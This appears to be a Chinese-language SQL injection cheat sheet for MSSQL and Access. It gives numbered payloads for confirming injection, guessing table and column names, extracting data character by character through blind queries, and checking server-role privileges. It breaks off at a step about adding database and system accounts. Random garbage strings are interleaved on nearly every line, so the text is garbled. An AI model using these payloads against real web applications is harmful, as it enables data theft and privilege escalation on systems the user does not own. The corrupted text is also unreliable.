1.判断是否有注入;and 1=1 ;and 1=2 $QJ3~mG2
2.初步判断是否是mssql ;and user>0 m6Dm1'+
o/AG9|()4
3.注入参数是字符'and [查询条件] and ''=' e!u]l
*yZ6"
4.搜索时没过滤参数的'and [查询条件] and '%25'=' yR$_ZXsd
G(E1c"?
5.判断数据库系统 `YOYC
5%-{r&
;and (select count(*) from sysobjects)>0 mssql }7.A~h
[$dVs16K
;and (select count(*) from msysobjects)>0 access Q{/z>-X\x
t=%zY~P
j0l{Mc5
J6 ~Sr
6.猜数据库 ;and (select Count(*) from [数据库名])>0 N&8$tJ(hhx
aCZ0-X?c
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 P1F-Wy1
V^7.@BeT
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 PT>b%7Of
@A[)\E1
9.(1)猜字段的ascii值(access) %. 1/#{
v
:pT(0N
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 1}VaBsEV
yP"2.9\erH
(2)猜字段的ascii值(mssql) >}SEU-7&\
GcO2oq
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 `KQx#c>'
jg$qp%7i%
10.测试权限结构(mssql) 86#l$QaK{
LnR>!0:c
/&gg].&2?
^O}a,
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- =2!p>>t,d;
rPk|2l,E,3
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- }Rh\JDiQ
z5@XFaQ
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- D]~K-[V?l
rWht},-|1
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- a`wjZ"}'[
3kxo1eb
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- Sca"LaW1
7Kw'Y8
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- 4[lFurH
l7QxngWw
;and 1=(select IS_MEMBER('db_owner'));-- ~,lt^@a
')jItje|
y
4i3m(S
R ]Ev=V'U
11.添加mssql和系统的帐户 fe\lSGmf
:9&